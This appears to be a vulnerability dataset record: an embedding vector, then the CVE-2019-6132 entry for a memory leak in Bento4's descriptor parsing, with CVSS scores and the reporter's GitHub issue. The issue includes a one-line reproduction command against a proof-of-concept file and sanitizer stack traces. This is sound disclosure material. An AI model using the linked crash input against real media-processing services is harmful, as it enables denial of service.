0.011052560992538929, 0.018741639330983162, 0.007990227080881596, -0.0038992934860289097, 0.00476754130795598, -0.003011490451171994, -0.026876574382185936, -0.033228080719709396, -0.005002202931791544, 0.0112324682995677, 0.018819859251379967, 0.00010351998207625002, -0.0016455644508823752, -0.011365443468093872, -0.00656661344692111, 0.005905650090426207, -0.01115424744784832, -0.0067699868232011795, -0.01108384970575571, -0.030208770185709, 0.010872653685510159, -0.006210710387676954, 0.02984895557165146, 0.034385744482278824, 0.0007044736412353814, -0.005991692654788494, -0.0032344190403819084, 0.0072510433383286, 0.009386464022099972, 0.017756061628460884, -0.01784992590546608, 0.0030427786987274885, 0.024091923609375954, 0.011545350775122643, 0.024295296519994736, -0.015018342062830925, -0.01337571069598198, 0.0015253003221005201, 0.022715242579579353, 0.006202888209372759, 0.03548083454370499, -0.005647522397339344, -0.0016817414434626698, 0.007188466843217611, 0.0032011752482503653, -0.02423272095620632, -0.00716891186311841, -0.018788572400808334, 0.01907016523182392, 0.020008811727166176, 0.0037839182186871767, 0.008909318596124649, -0.002385726198554039, 0.010348576121032238, -0.012601328082382679, 0.022089477628469467, -0.009214378893375397, 0.00018797371012624353, -0.015213893726468086, -0.008017604239284992, 0.008385241031646729, 0.012006851844489574, 0.01064581423997879, -0.01817845180630684, 0.005956493318080902, 0.003052556188777089, -0.011138604022562504, -0.023466158658266068, 0.01228062342852354, 0.006871673744171858, -0.0045250579714775085, 0.003261796198785305, -0.012241513468325138, -0.024451738223433495, -0.01364948321133852, 0.000658030214253813, -0.0046150111593306065, 0.000015873267329880036, 0.0033067730255424976, 0.027533628046512604, -0.014400400221347809, -0.00023160609998740256, -0.012491818517446518, -0.014447332359850407, -0.01766219548881054, -0.005142999812960625, 0.0032696181442588568, 0.036106597632169724, -0.02830018848180771, -0.011686147190630436, -0.015659751370549202, 0.017192872241139412, 0.013516508042812347, 0.0035003689117729664, -0.004802740644663572, -0.005846984684467316, -0.020681507885456085, -0.006813008338212967, 0.011889521032571793, 0.005307263229042292, -0.015362512320280075, 0.012773413211107254, -0.013868500478565693, -0.024498671293258667, 0.01175654586404562, 0.004364705644547939, -0.0073018865659832954, -0.00019322916341479868, 0.013446109369397163, -0.003126865718513727, -0.014603773131966591, -0.028597425669431686, -0.02111954428255558, -0.015870945528149605, -0.00943339616060257, -0.011459307745099068, -0.007411395199596882, 0.017427533864974976, -0.001204596133902669, -0.0015389890177175403, -0.014298712834715843, 0.020665865391492844, 0.011811300180852413, 0.017802992835640907, -0.0012319734087213874, 0.008768521249294281, -0.006476660259068012, 0.013962364755570889, -0.035605985671281815, -0.004415548872202635, -0.016520176082849503, -0.000869225652422756, -0.01055977214127779, 0.013579084537923336, -0.0051938435062766075, -0.008971895091235638, 0.02524958737194538, -0.011623570695519447, -0.0068990509025752544, 0.008776343427598476, 0.0059291161596775055, -0.031100483611226082, -0.002591055119410157, 0.011185536161065102, 0.005710098892450333, -0.017411889508366585, 0.018929367884993553, -0.0179907213896513, 0.0019291138742119074, -0.018475688993930817, 0.006050358060747385, -0.00987925287336111, -0.029989751055836678, -0.03069373592734337, -0.01502616424113512, -0.0007142512477003038, -0.01702078804373741, 0.016848701983690262, -0.020196542143821716, 0.014048407785594463, -0.007603035774081945, 0.0068403854966163635, 0.005897827912122011, 0.005307263229042292, 0.005405038595199585, -0.0019144475227221847, -0.00034808137570507824, 0.012929853983223438, 0.003431925782933831, 0.0010442441562190652, -0.014150094240903854, -0.017302380874753, 0.016879990696907043, -0.00476754130795598, -0.007876807823777199, 0.009198734536767006, 0.0031170882284641266, -0.008674656972289085, -0.010692746378481388, -0.00541286077350378, 0.006030803080648184, -0.010450263507664204, -0.028253255411982536, 0.00935517530888319, 0.008729411289095879, 0.013782457448542118, 0.01767783984541893, -0.011529706418514252, 0.0021451981738209724, -0.008565148338675499, -0.01769348420202732, -0.020509423688054085, 0.0264228954911232, 0.013641661033034325, -0.005099978763610125, -0.018600841984152794, -0.007165000773966312, -0.017724772915244102, 0.0283158328384161, 0.009331709705293179, 0.005897827912122011, -0.02266830950975418, 0.002483501797541976, 0.021526290103793144, -0.016011742874979973, -0.012327555567026138, -0.001333660096861422, 0.009331709705293179, -0.002305550267919898, -0.01958642154932022, -0.00004457959221326746, 0.03307164087891579, -0.006328041199594736, -0.0003427037154324353, 0.0036900534760206938, -0.005643611308187246, 0.01208507176488638, 0.018600841984152794, 0.019852371886372566, -0.0055614798329770565, 0.021510645747184753, 0.008479105308651924, -0.008041070774197578, -0.014376933686435223, -0.016441956162452698, 0.009550726972520351, 0.007630412932485342, -0.005002202931791544, -0.023309718817472458, -0.0008257154840976, -0.007583480328321457, 0.015714505687355995, 0.020806660875678062, -0.011318511329591274, 0.014486442320048809, -0.004837939981371164, 0.00850257184356451, -0.007845519110560417, -0.005569302011281252, -0.006507948040962219, 0.008643369190394878, -0.00883109774440527, -0.013539973646402359, 0.0006932294345460832, -0.013406999409198761, -0.012710836715996265, -0.011693969368934631, -0.004302129149436951, -0.01921096257865429, 0.017286738380789757, -0.0442415326833725, 0.01767783984541893, 0.0016582752577960491, 0.003684187075123191, -0.009840142913162708, -0.01702078804373741, -0.0012368621537461877, 0.013688593171536922, -0.042301662266254425, 0.006285019684582949, -0.03164802864193916, -0.023278430104255676, 0.011193358339369297, 0.0026634091045707464, 0.003725252812728286, -0.015276470221579075, -0.009542904794216156, -0.005866539664566517, -0.01193645317107439, -0.008721589110791683, -0.0022586178965866566, 0.013680770993232727, 0.003920804243534803, -0.019492557272315025, 0.006011248100548983, -0.011545350775122643, -0.038359347730875015, 0.018115874379873276, 0.019602065905928612, -0.040799830108881, 0.00017978499818127602, 0.008353953249752522, -0.011991207487881184, 0.019664641469717026, 0.0014646794879809022, -0.02007138915359974, -0.013250557705760002, 0.008009782060980797, -0.00420044269412756, -0.0010334887774661183, 0.001564410631544888, 0.0017159628914669156, 0.005909561179578304, -0.006030803080648184, -0.015996098518371582, 0.005248597823083401, 0.0009137135930359364, -0.007868985645473003, -0.000017217684217030182, 0.0011605971958488226, 0.004736253060400486, -0.01716158539056778, 0.026235166937112808, 0.007736010476946831, 0.023043768480420113, 0.0008134935051202774, 0.010325110517442226, 0.008346131071448326, 0.00587827293202281, 0.0028941596392542124, -0.005674899555742741, 0.003021267941221595, -0.004654121585190296, 0.006339774001389742, -0.003697875654324889, 0.0018352492479607463, -0.029598649591207504, 0.007583480328321457, -0.005002202931791544, -0.0092534888535738, -0.0038582277484238148, 0.000006030772510712268, 0.024420449510216713, 0.002551944926381111, -0.012765591032803059, -0.00944904051721096, 0.004208264406770468, 0.035793714225292206, 0.0138997882604599, 0.010708390735089779, -0.007927650585770607, 0.0006531414692290127, -0.01645760051906109, -0.01082572154700756, 0.010520661249756813, -0.0005900761461816728, -0.0014382799854502082, 0.013383532874286175, 0.002213641069829464, 0.011537528596818447, 0.012030317448079586, 0.0015233448939397931, 0.013399177230894566, -0.009668057784438133, 0.012108538299798965, 0.0022195077035576105, 0.008150579407811165, 0.009558549150824547, 0.027361541986465454, -0.007560014259070158, -0.016238583251833916, 0.012225869111716747, -0.017959434539079666, -0.0028765599709004164, -0.015902234241366386, -0.010849188081920147, -0.005780497100204229, -0.0011752635473385453, 0.04602495953440666, 0.017052076756954193, -0.0032715736888349056, 0.015886589884757996, 0.015080918557941914, 0.016269870102405548, -0.0028687380254268646, 0.007329263724386692, -0.0015135672874748707, 0.003985336050391197, -0.003185531124472618, 0.0004272796504665166, -0.024326585233211517, 0.007223666179925203, -0.005342462100088596, -0.013743347488343716, 0.013524330221116543, 0.02675142139196396, -0.004712786991149187, 0.023732108995318413, 0.012186759151518345, -0.001862626406364143, 0.01838182471692562, 0.006198977120220661, -0.014212670736014843, 0.006249820347875357, 0.004012713208794594, 0.011647037230432034, 0.007356640882790089, -0.006801275070756674, 0.007360551971942186, -0.0007690056227147579, -0.003938403911888599, 0.008635547012090683, -0.01681741513311863, -0.016348091885447502, 0.0037506744265556335, -0.007485704962164164, 0.009300420992076397, 0.011279400438070297, -0.01786557026207447, 0.017740417271852493, 0.022871684283018112, 0.016269870102405548, -0.012781234458088875, -0.004861406050622463, 0.00908922590315342, 0.009097048081457615, 0.003185531124472618, -0.007153267506510019, 0.0003515035205055028, 0.0002647275978233665, 0.014713281765580177, -0.00767734507098794, -0.008408707566559315, -0.01406405121088028, 0.00341237080283463, 0.0017159628914669156, -0.006504037417471409, -0.001098020700737834, 0.027392830699682236, 0.005006114020943642, 0.036669787019491196, -0.0046854098327457905, 0.004364705644547939, -0.013352245092391968, 0.017959434539079666, 0.0012163292849436402, -0.012288445606827736, 0.01938304863870144, 0.012695192359387875, 0.004403816070407629, 0.007603035774081945, -0.01278905663639307, -0.01645760051906109, 0.01783428154885769, -0.005706187803298235, 0.008885852061212063, 0.01888243667781353, -0.002806161530315876, 0.017756061628460884, 0.005846984684467316, 0.013086294755339622, 0.007958939298987389, -0.0005270108231343329, 0.0028354942332953215, -0.005205576308071613, 0.0019007589435204864, 0.011193358339369297, 0.016770482063293457, -0.03161673992872238, 0.011905165389180183, -0.010872653685510159, 0.021573223173618317, -0.013672948814928532, 0.009503794834017754, 0.01856955513358116, -0.02934834361076355, -0.011873876675963402, -0.019523844122886658, -0.0043842606246471405, 0.01594134420156479, -0.0038093398325145245, 0.025609401986002922, 0.011826944537460804, 0.017537042498588562, 0.01322709210216999, -0.019836727529764175, 0.007188466843217611, 0.008119291625916958, -0.00007003181963227689, -0.010708390735089779, -0.011545350775122643, 0.010755322873592377, 0.006285019684582949, -0.01869470626115799, -0.014181382022798061, -0.010270356200635433, 0.018647775053977966, 0.009128335863351822, 0.012656082399189472, -0.026188233867287636, -0.02487412840127945, 0.017881212756037712, -0.015886589884757996, 0.008041070774197578, 0.012288445606827736, 0.018460044637322426, 0.002790517406538129, 0.0041456883773207664, -0.0017570287454873323, 0.0004725008911918849, 0.01371988095343113, 0.006836474407464266, 0.006011248100548983, -0.005463704001158476, -0.00328135141171515, -0.002921536797657609, 0.02010267600417137, -0.013360067270696163, 0.0044194599613547325, 0.010450263507664204, 0.0019447579979896545, -0.00755610316991806, -0.0224649365991354, -0.01253875158727169, 0.005436326842755079, 0.00026228322531096637, -0.010802255012094975, 0.007520904298871756, -0.03641948103904724, 0.01752140000462532, 0.015425088815391064, -0.01628551445901394, -0.001853826572187245, -0.012585683725774288, 0.003848450258374214, -0.00484576215967536, 0.0016132984310388565, -0.011443663388490677, 0.012390132062137127, 0.005674899555742741, -0.046775877475738525, 0.020837949588894844, 0.010849188081920147, 0.0047558085061609745, 0.023247141391038895, -0.016786126419901848, 0.0003189931157976389, -0.009746278636157513, -0.0009088247898034751, 0.008705944754183292, 0.006992915645241737, -0.0016181872924789786, 0.00270643038675189, 0.0002703497011680156, 0.009417751803994179, -0.0042121754959225655, -0.005706187803298235, 0.010160846635699272, -0.0022214630153030157, 0.007286242675036192, 0.00464238878339529, 0.019304826855659485, -0.018225383013486862, 0.009237844496965408, -0.002196041401475668, -0.014478620141744614, 0.016363734379410744, -0.0290041733533144, -0.025797130540013313, -0.0019095587776973844, -0.017286738380789757, 0.015127850696444511, -0.017224160954356194, 0.0007269620546139777, -0.0022957725450396538, -0.02041555941104889, -0.016770482063293457, -0.005522369407117367, 0.011819122359156609, -0.0037702296394854784, 0.0046267444267869, -0.0026047436986118555, 0.010637992061674595, 0.015706682577729225, 0.011224646121263504, 0.0027181634213775396, 0.001527255866676569, 0.02282475121319294, -0.010051338002085686, 0.008909318596124649, 0.010403330437839031, 0.018757283687591553, 0.014376933686435223, -0.01614471711218357, -0.017224160954356194, 0.02268395386636257, -0.00343388132750988, -0.027752645313739777, -0.007427039556205273, -0.01989930309355259, 0.01972721889615059, -0.0037135197781026363, 0.023982414975762367, -0.008838919922709465, -0.005667077377438545, 0.008690301328897476, 0.01924225129187107, 0.011326332576572895, -0.0012925942428410053, -0.005099978763610125, 0.007966761477291584, 0.0015262780943885446, 0.01664532907307148, -0.003238330129534006, 0.010919585824012756, 0.020306050777435303, -0.004482036456465721, 0.0046267444267869, 0.013516508042812347, -0.010411152616143227, 0.01975850574672222, -0.00351601280272007, -0.012992430478334427, 0.013399177230894566, -0.0006917628343217075, 0.0035961889661848545, 0.021541934460401535, -0.003780007129535079, 0.005174288060516119, 0.005346373189240694, 0.0004734786634799093, 0.0003160598280373961, 0.013266202062368393, 0.012202402576804161, -0.002023956272751093, 0.020384270697832108, -0.00928477756679058, -0.007047669962048531, 0.000030799335945630446, 0.011498418636620045, 0.013320956379175186, -0.007505259942263365, 0.03005232848227024, -0.009214378893375397, -0.012937676161527634, -0.013586906716227531, -0.0007137623615562916, -0.021166475489735603, 0.011920808814466, -0.004102666862308979, 0.011748723685741425, 0.009714989922940731, 0.020040100440382957, -0.0006614523590542376, -0.014736748300492764, 0.0013541929656639695, 0.0059291161596775055, 0.006609634961932898, -0.02251186966896057, -0.014885366894304752, -0.03454218804836273, 0.00036788094439543784, -0.0049865590408444405, 0.00028794934041798115, -0.02382597327232361, 0.002501101465895772, -0.0007518948405049741, -0.01616036146879196, -0.023231497034430504, 0.005749209318310022, 0.019508199766278267, 0.008463461883366108, 0.00775947654619813, 0.009863609448075294, 0.016441956162452698, -0.03103790618479252, 0.02263702265918255, -0.01800636574625969, 0.02524958737194538, 0.011584460735321045, -0.014736748300492764, -0.0059173833578825, 0.01700514368712902, 0.00012759724631905556, -0.013954542577266693, 0.007063313852995634, -0.013352245092391968, 0.027377186343073845, 0.0203999150544405, 0.00605818023905158, -0.011404553428292274, -0.004693232011049986, -0.01397800911217928, 0.015245181508362293, 0.01492447778582573, 0.0022195077035576105, 0.0262508112937212, 0.0013395266141742468, -0.003758496604859829, 0.00034025931381620467, 0.013430465012788773, 0.005428505130112171, 0.0008599369903095067, 0.02335665002465248, -0.022371072322130203, -0.002495235064998269, -0.0217765960842371, -0.009206556715071201, 0.012898565270006657, 0.006355418357998133, 0.011780012398958206, 0.01645760051906109, -0.01891372539103031, 0.01922660693526268, 0.010145203210413456, 0.000784160802140832, -0.01836618036031723, -0.027173813432455063, 0.009237844496965408, -0.010653636418282986, -0.006253731437027454, -0.005522369407117367, -0.003830850590020418, -0.014814969152212143, -0.008260088041424751, -0.011271578259766102, 0.010372042655944824, -0.006355418357998133, 0.002180397277697921, -0.0051234448328614235, 0.02110389992594719, 0.027205100283026695, -0.0045837233774363995, 0.0010637992527335882, -0.010184313170611858, 0.009621125645935535, -0.01451773103326559, 0.012695192359387875, -0.02864435873925686, 0.009902719408273697, -0.0011645081685855985, 0.014478620141744614, 0.006789542268961668, 0.0003287706640549004, 0.009894897229969501, 0.002591055119410157, 0.0021432426292449236, -0.0003163042711094022, 0.004427282139658928, 0.016879990696907043, 0.010473729111254215, 0.015339046716690063, 0.004180887248367071, -0.010911764577031136, -0.002843316411599517, 0.0005015891510993242, 0.0052955299615859985, 0.011381087824702263, -0.0051234448328614235, 0.037858735769987106, 0.033040352165699005, 0.008713766932487488, 0.007990227080881596, 0.013258379884064198, -0.01339135505259037, 0.0018567598890513182, 0.005784408189356327, 0.004239552654325962, 0.006476660259068012, 0.025343451648950577, 0.005905650090426207, 0.00015289669681806117, 0.007051581051200628, 0.007352729793637991, -0.010458084754645824, 0.01611343026161194, 0.014275247231125832, -0.005530191585421562, -0.006339774001389742, -0.019429979845881462, 0.00969152431935072, 0.02423272095620632, 0.005995603743940592, 0.0022742620203644037, -0.023215854540467262, 0.013000252656638622, 0.03566856309771538, -0.013891966082155704, 0.013970186933875084, -0.023716464638710022, 0.0061364006251096725, -0.020837949588894844, -0.01939869113266468, 0.0250462144613266, 0.0024756798520684242, 0.013665126636624336, 0.0043177735060453415, -0.005463704001158476, -0.0025226122234016657, -0.010027872398495674, 0.01466634962707758, 0.00634368509054184, 0.008041070774197578, 0.011920808814466, -0.02182352915406227, 0.020352981984615326, 0.013266202062368393, -0.02266830950975418, 0.007837696932256222, 0.0038034734316170216, 0.003699831198900938, 0.0032578851096332073, -0.0011429975274950266, -0.008127112872898579, 0.011787834577262402, -0.012382309883832932, -0.002154975663870573, 0.0030603783670812845, -0.01406405121088028, -0.000714740133844316, -0.012796878814697266, -0.023419227451086044, -0.03279004618525505, -0.0009645569371059537, 0.011044738814234734, 0.010966518893837929, -0.00892496295273304, -0.0019222695846110582, -0.009472506120800972, -0.0004632121999748051, 0.006586168892681599, -0.01108384970575571, -0.013320956379175186, 0.0006946960929781199, -0.03072502464056015, 0.00833830889314413, 0.007356640882790089, 0.015886589884757996, -0.002653631614521146, 0.002041555941104889, -0.006425816565752029, 0.010004405863583088, -0.02731460891664028, -0.005142999812960625, 0.010176490992307663, -0.01296896394342184, 0.012124182656407356, 0.020712796598672867, 0.0038640943821519613, 0.03196090832352638, 0.010817899368703365, 0.016082141548395157, -0.015237359330058098, -0.0052720638923347, 0.0023368382826447487, 0.014009296894073486, 0.00004415182411321439, -0.009761922061443329, -0.009026649408042431, -0.005256419535726309, -0.0018596930895000696, 0.005338551476597786, -0.01645760051906109, -0.0008863363764248788, -0.004395993892103434, 0.03404157608747482, -0.007700811140239239, 0.0007665611919946969, 0.0033673939760774374, 0.00781423132866621, 0.008917140774428844, 0.003975558560341597, -0.004677587654441595, 0.015472020953893661, -0.007204111199826002, 0.01357126235961914, -0.027424117550253868, -0.004704964812844992, -0.03022441267967224, 0.0013287712354213, 0.012225869111716747, 0.005987781565636396, -0.024623824283480644, 0.020837949588894844, -0.02578148804605007, -0.022214630618691444, 0.0021491090301424265, -0.0021021768916398287, 0.024608179926872253, 0.018460044637322426, -0.006734787952154875, 0.022198986262083054, 0.027674423530697823, 0.004157421179115772, 0.01695821061730385, -0.019429979845881462, -0.005627967417240143, -0.015378156676888466, -0.008009782060980797, 0.010786611586809158, -0.00815840158611536, -0.014455154538154602, -0.0035629451740533113, -0.033040352165699005, -0.013868500478565693, -0.001988756936043501, 0.020556354895234108, 0.013187981210649014, 0.016082141548395157, -0.0038660496938973665, -0.0010999762453138828, -0.015253003686666489, 0.017411889508366585, 0.006191154941916466, 0.010113914497196674, 0.0026653646491467953, 0.005620145238935947, 0.000677585368975997, -0.010528483428061008, -0.013477398082613945, 0.0621383897960186, -0.0004871672426816076, 0.0284879170358181, -0.004869228228926659, -0.011944275349378586, 0.0019164030672982335, -0.010426796972751617, -0.02075972966849804, -0.007825964130461216, 0.01803765445947647, -0.00411831121891737, -0.004251285921782255, 0.005604500882327557, -0.0018743594409897923, 0.011474952101707458, -0.0034495254512876272, 0.0026458094362169504, -0.007915917783975601, -0.010473729111254215, -0.014627239666879177, -0.019617710262537003, 0.0012339288368821144, 0.02470204420387745, -0.016942566260695457, 0.0005719876498915255, 0.010857010260224342, -0.005506725516170263, -0.017130296677350998, -0.0014373023295775056, -0.015127850696444511, 0.019101453945040703, -0.022965548560023308, 0.01716158539056778, 0.005197754129767418, -0.0005866540013812482, 0.009472506120800972, 0.020384270697832108, 0.01631680317223072, -0.012804700993001461, -0.019320471212267876, 0.012616971507668495, 0.01855391077697277, -0.013665126636624336, 0.003148376476019621, -0.004708875901997089, -0.014799324795603752, -0.006449282635003328, 0.00012710836017504334, 0.0011087760794907808, 0.010184313170611858, 0.019304826855659485, 0.004376438912004232, 0.003279395867139101, -0.0008208266808651388, -0.00908922590315342, -0.029489140957593918, -0.01397800911217928, -0.00158592127263546, -0.01030164398252964, -0.01752140000462532, -0.0009816676611080766, -0.01974286139011383, -0.005350284278392792, 0.004059645812958479, -0.017724772915244102, -0.015409444458782673, 0.0019349803915247321, 0.010669280774891376, -0.030177481472492218, 0.02299683727324009, 0.006590079981833696, -0.003222686005756259, -0.012374487705528736, -0.00868247915059328, -0.0086511904373765, -0.00377805158495903, 0.004075289703905582, -0.012405776418745518, 0.01228062342852354, -0.0019506245153024793, -0.014095339924097061, -0.001544855535030365, -0.00511171156540513, -0.0011107315076515079, 0.005225131753832102, -0.0035003689117729664, -0.003942315001040697, -0.004681498743593693, -0.017474466934800148, 0.026892218738794327, 0.012562217190861702, -0.011615748517215252, -0.02743976190686226, -0.00004571012323140167, 0.011952097527682781, -0.0112324682995677, -0.0032891733571887016, -0.015714505687355995, -0.003451480995863676, 0.012632615864276886, 0.006902961991727352, 0.01346957590430975, -0.009847965091466904, -0.0010276222601532936, -0.004978736862540245, -0.016207294538617134, 0.009120513685047626, -0.008948428556323051, -0.01903887651860714, 0.0019330248469486833, 0.017896857112646103, 0.004036179278045893, -0.011959919705986977, -0.006601812783628702, 0.01106820534914732, 0.010935230180621147, 0.011467129923403263, 0.000493522675242275, 0.0036294327583163977, 0.010778789408504963, 0.006883407011628151, -0.004517235793173313, 0.023121988400816917, 0.0262508112937212, 0.013109761290252209, 0.0027201189659535885, 0.004286485258489847, 0.008674656972289085, -0.0031561984214931726, 0.005401127506047487, -0.003205086337402463, -0.019273538142442703, 0.027768289670348167, 0.013798101805150509, -0.001507700770162046, 0.007258865516632795, -0.011287222616374493, 0.009402108378708363, 0.0125231072306633, -0.003602055599913001, 0.009988761506974697, 0.04054952412843704, 0.0005514547228813171, 0.016097785905003548, -0.011881698854267597, 0.01371988095343113, -0.0013796145794913173, 0.006504037417471409, -0.0075091710314154625, -0.014353467151522636, 0.023419227451086044, 0.0027122970204800367, 0.008612080477178097, 0.005256419535726309, 0.008095825091004372, 0.0005186998751014471, -0.0012603283394128084, 0.01974286139011383, -0.02748669497668743, -0.0022996836341917515, 0.005823518615216017, 0.008627724833786488, 0.0016915190499275923, -0.007638235110789537, 0.008604258298873901, 0.006570524536073208, 0.002608654787763953, -0.01871035061776638, 0.02933269925415516, -0.015378156676888466, -0.028221968561410904, 0.011130781844258308, 0.002962602535262704, -0.00943339616060257, 0.012210224755108356, 0.012601328082382679, 0.0205719992518425, 0.015730148181319237, 0.017474466934800148, 0.01750575564801693, 0.021495001390576363, 0.0014060140820220113, 0.010575415566563606, 0.023904195055365562, 0.03557469695806503, -0.006797363981604576, -0.018616486340761185, -0.01614471711218357, 0.010786611586809158, -0.0003945248026866466, -0.006547058466821909, -0.008330486714839935, 0.004877049941569567, 0.00162112049292773, -0.0008379374630749226, 0.021401137113571167, 0.02590664103627205, -0.005667077377438545, 0.018679063767194748, -0.010066982358694077, 0.012742124497890472, -0.013891966082155704, -0.021025678142905235, 0.013610372319817543 ]
53
CVE-2019-6132
2019-01-11T05:29:01.763000
An issue was discovered in Bento4 v1.5.1-627. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp when called from the AP4_EsdsAtom class in Core/Ap4EsdsAtom.cpp, as demonstrated by mp42aac.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/357" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/357
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
there is memory leaks in Ap4String.cpp ./mp42aac poc /dev/null ================================================================= ==15810==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 1 object(s) allocated from: #0 0x522860 in operator new(unsigned long) (/root/apps/Bento4/mp42aac+0x522860) #1 0x5c80a5 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/apps/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:122:22 #2 0x5f8687 in AP4_EsdsAtom::AP4_EsdsAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:76:9 #3 0x5f8687 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:52 #4 0x5e14cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:474:20 #5 0x5ddaa0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:221:14 #6 0x5d6aa5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/apps/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #7 0x56699d in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/apps/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115:9 Indirect leak of 32 byte(s) in 1 object(s) allocated from: #0 0x5229e0 in operator new[](unsigned long) (/root/apps/Bento4/mp42aac+0x5229e0) #1 0x557d0a in AP4_String::Assign(char const*, unsigned int) /root/apps/Bento4/Source/C++/Core/Ap4String.cpp:165:15 SUMMARY: AddressSanitizer: 128 byte(s) leaked in 2 allocation(s). [bento4-memory-leak-AP4_String.zip](https://github.com/axiomatic-systems/Bento4/files/2746334/bento4-memory-leak-AP4_String.zip)
memory leaks in Ap4String.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/357/comments
1
2019-01-10T17:00:31
2019-01-12T09:36:13Z
https://github.com/axiomatic-systems/Bento4/issues/357
397,925,621
357
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : memory leaks in Ap4String.cpp Issue date: --- start body --- there is memory leaks in Ap4String.cpp ./mp42aac poc /dev/null ================================================================= ==15810==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 1 object(s) allocated from: #0 0x522860 in operator new(unsigned long) (/root/apps/Bento4/mp42aac+0x522860) #1 0x5c80a5 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/apps/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:122:22 #2 0x5f8687 in AP4_EsdsAtom::AP4_EsdsAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:76:9 #3 0x5f8687 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:52 #4 0x5e14cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:474:20 #5 0x5ddaa0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:221:14 #6 0x5d6aa5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/apps/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #7 0x56699d in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/apps/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115:9 Indirect leak of 32 byte(s) in 1 object(s) allocated from: #0 0x5229e0 in operator new[](unsigned long) (/root/apps/Bento4/mp42aac+0x5229e0) #1 0x557d0a in AP4_String::Assign(char const*, unsigned int) /root/apps/Bento4/Source/C++/Core/Ap4String.cpp:165:15 SUMMARY: AddressSanitizer: 128 byte(s) leaked in 2 allocation(s). [bento4-memory-leak-AP4_String.zip](https://github.com/axiomatic-systems/Bento4/files/2746334/bento4-memory-leak-AP4_String.zip) --- end body ---
2,088
